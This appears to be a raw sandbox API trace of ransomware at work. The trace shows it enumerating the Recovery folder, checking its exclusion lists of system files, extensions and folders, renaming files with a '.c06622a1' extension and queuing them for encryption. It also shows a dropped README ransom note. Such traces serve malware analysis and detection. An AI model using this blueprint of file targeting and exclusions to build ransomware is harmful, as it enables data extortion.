_Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0136.370] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 0x34 [0136.370] wcscpy (in: _Dest=0x44a00ca, _Source="boot.sdi" | out: _Dest="boot.sdi") returned="boot.sdi" [0136.370] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", dwFileAttributes=0x80) returned 1 [0136.370] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0136.370] SetFilePointerEx (in: hFile=0x614, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.371] ReadFile (in: hFile=0x614, lpBuffer=0x3fedf4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fee84, lpOverlapped=0x0 | out: lpBuffer=0x3fedf4*, lpNumberOfBytesRead=0x3fee84*=0x90, lpOverlapped=0x0) returned 1 [0136.374] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fedf4, Length=0x80) returned 0xbcac1050 [0136.374] RtlComputeCrc32 (PartialCrc=0x1050, Buffer=0x3fedf4, Length=0x80) returned 0xe62c5159 [0136.375] RtlComputeCrc32 (PartialCrc=0x5159, Buffer=0x3fedf4, Length=0x80) returned 0x483eb1c5 [0136.375] RtlComputeCrc32 (PartialCrc=0xb1c5, Buffer=0x3fedf4, Length=0x80) returned 0x1ece357 [0136.375] RtlComputeCrc32 (PartialCrc=0xe357, Buffer=0x3fedf4, Length=0x80) returned 0x63268cde [0136.375] CloseHandle (hObject=0x614) returned 1 [0136.375] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0136.375] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0136.375] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned 0x3d [0136.375] wcscpy (in: _Dest=0x44b00e2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0136.375] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1"), dwFlags=0x8) returned 1 [0136.382] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x614 [0136.382] CreateIoCompletionPort (FileHandle=0x614, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0136.382] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x9be836b [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c6a882 [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6391e213 [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x720c375d [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32ec119 [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57b9d578 [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa50e62b [0136.387] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e63c232 [0136.391] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x1b5c5325 [0136.391] RtlComputeCrc32 (PartialCrc=0x5325, Buffer=0x2f30094, Length=0x80) returned 0x19dc1267 [0136.391] RtlComputeCrc32 (PartialCrc=0x1267, Buffer=0x2f30094, Length=0x80) returned 0x32fdeb1a [0136.391] RtlComputeCrc32 (PartialCrc=0xeb1a, Buffer=0x2f30094, Length=0x80) returned 0x14eb6f33 [0136.392] RtlComputeCrc32 (PartialCrc=0x6f33, Buffer=0x2f30094, Length=0x80) returned 0x6d570335 [0136.392] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0136.392] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0136.392] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0136.392] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfec7de0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xcfec7de0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xcfec7de0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0136.392] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0136.392] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x0, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0136.392] _wcsicmp (_Str1="Winre.wim", _Str2="README.c06622a1.TXT") returned 5 [0136.392] wcsstr (_Str="Winre.wim", _SubStr="README") returned 0x0 [0136.392] _wcsicmp (_Str1="autorun.inf", _Str2="Winre.wim") returned -22 [0136.392] wcslen (_String="autorun.inf") returned 0xb [0136.392] _wcsicmp (_Str1="boot.ini", _Str2="Winre.wim") returned -21 [0136.392] wcslen (_String="boot.ini") returned 0x8 [0136.392] _wcsicmp (_Str1="bootfont.bin", _Str2="Winre.wim") returned -21 [0136.392] wcslen (_String="bootfont.bin") returned 0xc [0136.392] _wcsicmp (_Str1="bootsect.bak", _Str2="Winre.wim") returned -21 [0136.392] wcslen (_String="bootsect.bak") returned 0xc [0136.392] _wcsicmp (_Str1="desktop.ini", _Str2="Winre.wim") returned -19 [0136.392] wcslen (_String="desktop.ini") returned 0xb [0136.392] _wcsicmp (_Str1="iconcache.db", _Str2="Winre.wim") returned -14 [0136.392] wcslen (_String="iconcache.db") returned 0xc [0136.392] _wcsicmp (_Str1="ntldr", _Str2="Winre.wim") returned -9 [0136.392] wcslen (_String="ntldr") returned 0x5 [0136.392] _wcsicmp (_Str1="ntuser.dat", _Str2="Winre.wim") returned -9 [0136.392] wcslen (_String="ntuser.dat") returned 0xa [0136.393] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Winre.wim") returned -9 [0136.393] wcslen (_String="ntuser.dat.log") returned 0xe [0136.393] _wcsicmp (_Str1="ntuser.ini", _Str2="Winre.wim") returned -9 [0136.393] wcslen (_String="ntuser.ini") returned 0xa [0136.393] _wcsicmp (_Str1="thumbs.db", _Str2="Winre.wim") returned -3 [0136.393] wcslen (_String="thumbs.db") returned 0x9 [0136.393] _wcsicmp (_Str1="386", _Str2="wim") returned -68 [0136.393] wcslen (_String="386") returned 0x3 [0136.393] _wcsicmp (_Str1="adv", _Str2="wim") returned -22 [0136.393] wcslen (_String="adv") returned 0x3 [0136.393] _wcsicmp (_Str1="ani", _Str2="wim") returned -22 [0136.393] wcslen (_String="ani") returned 0x3 [0136.393] _wcsicmp (_Str1="bat", _Str2="wim") returned -21 [0136.393] wcslen (_String="bat") returned 0x3 [0136.393] _wcsicmp (_Str1="bin", _Str2="wim") returned -21 [0136.393] wcslen (_String="bin") returned 0x3 [0136.393] _wcsicmp (_Str1="cab", _Str2="wim") returned -20 [0136.393] wcslen (_String="cab") returned 0x3 [0136.393] _wcsicmp (_Str1="cmd", _Str2="wim") returned -20 [0136.393] wcslen (_String="cmd") returned 0x3 [0136.393] _wcsicmp (_Str1="com", _Str2="wim") returned -20 [0136.393] wcslen (_String="com") returned 0x3 [0136.393] _wcsicmp (_Str1="cpl", _Str2="wim") returned -20 [0136.393] wcslen (_String="cpl") returned 0x3 [0136.393] _wcsicmp (_Str1="cur", _Str2="wim") returned -20 [0136.393] wcslen (_String="cur") returned 0x3 [0136.393] _wcsicmp (_Str1="deskthemepack", _Str2="wim") returned -19 [0136.393] wcslen (_String="deskthemepack") returned 0xd [0136.393] _wcsicmp (_Str1="diagcab", _Str2="wim") returned -19 [0136.394] wcslen (_String="diagcab") returned 0x7 [0136.394] _wcsicmp (_Str1="diagcfg", _Str2="wim") returned -19 [0136.394] wcslen (_String="diagcfg") returned 0x7 [0136.394] _wcsicmp (_Str1="diagpkg", _Str2="wim") returned -19 [0136.394] wcslen (_String="diagpkg") returned 0x7 [0136.394] _wcsicmp (_Str1="dll", _Str2="wim") returned -19 [0136.394] wcslen (_String="dll") returned 0x3 [0136.394] _wcsicmp (_Str1="drv", _Str2="wim") returned -19 [0136.394] wcslen (_String="drv") returned 0x3 [0136.394] _wcsicmp (_Str1="exe", _Str2="wim") returned -18 [0136.394] wcslen (_String="exe") returned 0x3 [0136.394] _wcsicmp (_Str1="hlp", _Str2="wim") returned -15 [0136.394] wcslen (_String="hlp") returned 0x3 [0136.394] _wcsicmp (_Str1="icl", _Str2="wim") returned -14 [0136.394] wcslen (_String="icl") returned 0x3 [0136.394] _wcsicmp (_Str1="icns", _Str2="wim") returned -14 [0136.394] wcslen (_String="icns") returned 0x4 [0136.394] _wcsicmp (_Str1="ico", _Str2="wim") returned -14 [0136.394] wcslen (_String="ico") returned 0x3 [0136.394] _wcsicmp (_Str1="ics", _Str2="wim") returned -14 [0136.394] wcslen (_String="ics") returned 0x3 [0136.394] _wcsicmp (_Str1="idx", _Str2="wim") returned -14 [0136.394] wcslen (_String="idx") returned 0x3 [0136.394] _wcsicmp (_Str1="ldf", _Str2="wim") returned -11 [0136.394] wcslen (_String="ldf") returned 0x3 [0136.394] _wcsicmp (_Str1="lnk", _Str2="wim") returned -11 [0136.394] wcslen (_String="lnk") returned 0x3 [0136.394] _wcsicmp (_Str1="mod", _Str2="wim") returned -10 [0136.394] wcslen (_String="mod") returned 0x3 [0136.394] _wcsicmp (_Str1="mpa", _Str2="wim") returned -10 [0136.395] wcslen (_String="mpa") returned 0x3 [0136.395] _wcsicmp (_Str1="msc", _Str2="wim") returned -10 [0136.395] wcslen (_String="msc") returned 0x3 [0136.395] _wcsicmp (_Str1="msp", _Str2="wim") returned -10 [0136.395] wcslen (_String="msp") returned 0x3 [0136.395] _wcsicmp (_Str1="msstyles", _Str2="wim") returned -10 [0136.395] wcslen (_String="msstyles") returned 0x8 [0136.395] _wcsicmp (_Str1="msu", _Str2="wim") returned -10 [0136.395] wcslen (_String="msu") returned 0x3 [0136.395] _wcsicmp (_Str1="nls", _Str2="wim") returned -9 [0136.395] wcslen (_String="nls") returned 0x3 [0136.395] _wcsicmp (_Str1="nomedia", _Str2="wim") returned -9 [0136.395] wcslen (_String="nomedia") returned 0x7 [0136.395] _wcsicmp (_Str1="ocx", _Str2="wim") returned -8 [0136.395] wcslen (_String="ocx") returned 0x3 [0136.395] _wcsicmp (_Str1="prf", _Str2="wim") returned -7 [0136.395] wcslen (_String="prf") returned 0x3 [0136.395] _wcsicmp (_Str1="ps1", _Str2="wim") returned -7 [0136.395] wcslen (_String="ps1") returned 0x3 [0136.395] _wcsicmp (_Str1="rom", _Str2="wim") returned -5 [0136.395] wcslen (_String="rom") returned 0x3 [0136.395] _wcsicmp (_Str1="rtp", _Str2="wim") returned -5 [0136.395] wcslen (_String="rtp") returned 0x3 [0136.395] _wcsicmp (_Str1="scr", _Str2="wim") returned -4 [0136.395] wcslen (_String="scr") returned 0x3 [0136.395] _wcsicmp (_Str1="shs", _Str2="wim") returned -4 [0136.395] wcslen (_String="shs") returned 0x3 [0136.395] _wcsicmp (_Str1="spl", _Str2="wim") returned -4 [0136.395] wcslen (_String="spl") returned 0x3 [0136.395] _wcsicmp (_Str1="sys", _Str2="wim") returned -4 [0136.395] wcslen (_String="sys") returned 0x3 [0136.396] _wcsicmp (_Str1="theme", _Str2="wim") returned -3 [0136.396] wcslen (_String="theme") returned 0x5 [0136.396] _wcsicmp (_Str1="themepack", _Str2="wim") returned -3 [0136.396] wcslen (_String="themepack") returned 0x9 [0136.396] _wcsicmp (_Str1="wpx", _Str2="wim") returned 7 [0136.396] wcslen (_String="wpx") returned 0x3 [0136.396] _wcsicmp (_Str1="lock", _Str2="wim") returned -11 [0136.396] wcslen (_String="lock") returned 0x4 [0136.396] _wcsicmp (_Str1="key", _Str2="wim") returned -12 [0136.396] wcslen (_String="key") returned 0x3 [0136.396] _wcsicmp (_Str1="hta", _Str2="wim") returned -15 [0136.396] wcslen (_String="hta") returned 0x3 [0136.396] _wcsicmp (_Str1="msi", _Str2="wim") returned -10 [0136.396] wcslen (_String="msi") returned 0x3 [0136.396] _wcsicmp (_Str1="pdb", _Str2="wim") returned -7 [0136.396] wcslen (_String="pdb") returned 0x3 [0136.396] _wcsicmp (_Str1="sql", _Str2="wim") returned -4 [0136.396] wcslen (_String="sql") returned 0x3 [0136.396] _wcsicmp (_Str1="sqlite", _Str2="wim") returned -4 [0136.396] wcslen (_String="sqlite") returned 0x6 [0136.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 0x2016 [0136.396] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0136.396] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0136.396] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 0x34 [0136.396] wcscpy (in: _Dest=0x44a00ca, _Source="Winre.wim" | out: _Dest="Winre.wim") returned="Winre.wim" [0136.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", dwFileAttributes=0x80) returned 1 [0136.397] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0136.397] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.397] ReadFile (in: hFile=0x610, lpBuffer=0x3fedf4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fee84, lpOverlapped=0x0 | out: lpBuffer=0x3fedf4*, lpNumberOfBytesRead=0x3fee84*=0x90, lpOverlapped=0x0) returned 1 [0136.400] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fedf4, Length=0x80) returned 0xa8a7d037 [0136.400] RtlComputeCrc32 (PartialCrc=0xd037, Buffer=0x3fedf4, Length=0x80) returned 0xb62d594e [0136.400] RtlComputeCrc32 (PartialCrc=0x594e, Buffer=0x3fedf4, Length=0x80) returned 0x92fd9fd6 [0136.400] RtlComputeCrc32 (PartialCrc=0x9fd6, Buffer=0x3fedf4, Length=0x80) returned 0xba396bc3 [0136.400] RtlComputeCrc32 (PartialCrc=0x6bc3, Buffer=0x3fedf4, Length=0x80) returned 0x2f3675c4 [0136.400] CloseHandle (hObject=0x610) returned 1 [0136.400] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0136.400] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0136.400] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 0x3e [0136.400] wcscpy (in: _Dest=0x44b00e4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0136.400] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.c06622a1"), dwFlags=0x8) returned 1 [0136.402] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.c06622a1" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0136.403] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0136.403] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4967d2b2 [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27a7af6 [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x395013ec [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f5f9e7d [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x152811b4 [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7622f37c [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c99657b [0136.409] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x21c16a19 [0136.413] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x68e37c6e [0136.413] RtlComputeCrc32 (PartialCrc=0x7c6e, Buffer=0x41f0094, Length=0x80) returned 0xf819084e [0136.413] RtlComputeCrc32 (PartialCrc=0x84e, Buffer=0x41f0094, Length=0x80) returned 0x49301136 [0136.413] RtlComputeCrc32 (PartialCrc=0x1136, Buffer=0x41f0094, Length=0x80) returned 0xc29642f9 [0136.413] RtlComputeCrc32 (PartialCrc=0x42f9, Buffer=0x41f0094, Length=0x80) returned 0xb5ffcb96 [0136.413] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0136.414] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0136.414] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0136.414] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0136.414] FindClose (in: hFindFile=0x2db8700 | out: hFindFile=0x2db8700) returned 1 [0136.414] _wcsicmp (_Str1="backup", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0136.414] wcslen (_String="backup") returned 0x6 [0136.414] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4470048) returned 1 [0136.414] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4480050) returned 1 [0136.414] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfea1c80, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xcfea1c80, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xcfea1c80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0136.414] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0136.414] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0136.414] FindClose (in: hFindFile=0x2db8640 | out: hFindFile=0x2db8640) returned 1 [0136.417] _wcsicmp (_Str1="backup", _Str2="Recovery") returned -16 [0136.417] wcslen (_String="backup") returned 0x6 [0136.417] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2df4d60) returned 1 [0136.417] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e04d68) returned 1 [0136.417] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xcf8ae580, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xcf8ae580, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0136.417] _wcsicmp (_Str1="$recycle.bin", _Str2="System Volume Information") returned -79 [0136.417] wcslen (_String="$recycle.bin") returned 0xc [0136.417] _wcsicmp (_Str1="config.msi", _Str2="System Volume Information") returned -16 [0136.417] wcslen (_String="config.msi") returned 0xa [0136.417] _wcsicmp (_Str1="$windows.~bt", _Str2="System Volume Information") returned -79 [0136.417] wcslen (_String="$windows.~bt") returned 0xc [0136.417] _wcsicmp (_Str1="$windows.~ws", _Str2="System Volume Information") returned -79 [0136.417] wcslen (_String="$windows.~ws") returned 0xc [0136.417] _wcsicmp (_Str1="windows", _Str2="System Volume Information") returned 4 [0136.417] wcslen (_String="windows") returned 0x7 [0136.417] _wcsicmp (_Str1="appdata", _Str2="System Volume Information") returned -18 [0136.417] wcslen (_String="appdata") returned 0x7 [0136.417] _wcsicmp (_Str1="application data", _Str2="System Volume Information") returned -18 [0136.418] wcslen (_String="application data") returned 0x10 [0136.418] _wcsicmp (_Str1="boot", _Str2="System Volume Information") returned -17 [0136.418] wcslen (_String="boot") returned 0x4 [0136.418] _wcsicmp (_Str1="google", _Str2="System Volume Information") returned -12 [0136.418] wcslen (_String="google") returned 0x6 [0136.418] _wcsicmp (_Str1="mozilla", _Str2="System Volume Information") returned -6 [0136.418] wcslen (_String="mozilla") returned 0x7 [0136.418] _wcsicmp (_Str1="program files", _Str2="System Volume Information") returned -3 [0136.418] wcslen (_String="program files") returned 0xd [0136.418] _wcsicmp (_Str1="program files (x86)", _Str2="System Volume Information") returned -3 [0136.418] wcslen (_String="program files (x86)") returned 0x13 [0136.418] _wcsicmp (_Str1="programdata", _Str2="System Volume Information") returned -3 [0136.418] wcslen (_String="programdata") returned 0xb [0136.418] _wcsicmp (_Str1="system volume information", _Str2="System Volume Information") returned 0 [0136.418] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0136.418] _wcsicmp (_Str1="$recycle.bin", _Str2="Users") returned -81 [0136.418] wcslen (_String="$recycle.bin") returned 0xc [0136.418] _wcsicmp (_Str1="config.msi", _Str2="Users") returned -18 [0136.418] wcslen (_String="config.msi") returned 0xa [0136.418] _wcsicmp (_Str1="$windows.~bt", _Str2="Users") returned -81 [0136.418] wcslen (_String="$windows.~bt") returned 0xc [0136.418] _wcsicmp (_Str1="$windows.~ws", _Str2="Users") returned -81 [0136.418] wcslen (_String="$windows.~ws") returned 0xc [0136.418] _wcsicmp (_Str1="windows", _Str2="Users") returned 2 [0136.418] wcslen (_String="windows") returned 0x7 [0136.418] _wcsicmp (_Str1="appdata", _Str2="Users") returned -20 [0136.418] wcslen (_String="appdata") returned 0x7 [0136.418] _wcsicmp (_Str1="application data", _Str2="Users") returned -20 [0136.418] wcslen (_String="application data") returned 0x10 [0136.418] _wcsicmp (_Str1="boot", _Str2="Users") returned -19 [0136.419] wcslen (_String="boot") returned 0x4 [0136.419] _wcsicmp (_Str1="google", _Str2="Users") returned -14 [0136.419] wcslen (_String="google") returned 0x6 [0136.419] _wcsicmp (_Str1="mozilla", _Str2="Users") returned -8 [0136.419] wcslen (_String="mozilla") returned 0x7 [0136.419] _wcsicmp (_Str1="program files", _Str2="Users") returned -5 [0136.419] wcslen (_String="program files") returned 0xd [0136.419] _wcsicmp (_Str1="program files (x86)", _Str2="Users") returned -5 [0136.419] wcslen (_String="program files (x86)") returned 0x13 [0136.419] _wcsicmp (_Str1="programdata", _Str2="Users") returned -5 [0136.419] wcslen (_String="programdata") returned 0xb [0136.419] _wcsicmp (_Str1="system volume information", _Str2="Users") returned -2 [0136.419] wcslen (_String="system volume information") returned 0x19 [0136.419] _wcsicmp (_Str1="tor browser", 